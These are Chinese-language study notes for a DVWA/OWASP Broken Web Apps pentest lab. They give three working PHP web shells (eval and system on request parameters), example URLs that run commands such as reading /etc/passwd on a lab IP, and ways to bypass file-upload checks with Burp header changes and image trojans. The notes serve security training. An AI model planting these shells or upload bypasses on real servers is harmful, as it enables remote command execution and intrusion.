项目实验环境:
owasp下载:
https://sourceforge.net/projects/owaspbwa/files/1.2/OWASP_Broken_Web_Apps_VM_1.2.zip/download
测试渗透kali下载:
https://images.offensive-security.com/virtual-images/kali-linux-2018.2-vm-amd64.zip











//shell1    <?php @eval($_POST['yange']);?>
//设置菜刀url    http://192.168.218.128/dvwa/hackable/uploads/shell2.php,之后菜刀访问.
//shell2    <?php eval($_REQUEST['cmd']);?>
/*http://192.168.218.128/dvwa/hackable/uploads/shell2.php?cmd=phpinfo();*/
//其中cmd是输入的关键字,REQUEST是网页输入变量访问
//POST是使用菜刀类工具连接,c/s架构

//shell3   <?php system($_REQUEST['yange']);?>
/* http://192.168.218.128/dvwa/hackable/uploads/shell3.php?yange=cat /etc/passwd */
//shell3是使用linux命令方式,直接关键字yange匹配命令即可
//主要是函数eval和system之间区别,eval只能调用php自己的函数,system调用linux命令
@ 符号是表示当函数发生异常时不汇报。
##############
,文件上传漏洞:
低安全级别:直接随意上传各种类型文件
中安全级别:只能上传MIME类型为image/jpg的文件,可以通过burp设置代理劫持,更改header信息来完成
高安全级别:只能上传,jpg和jpeg的文件,可以通过图片木马,再配合文件包含漏洞处理.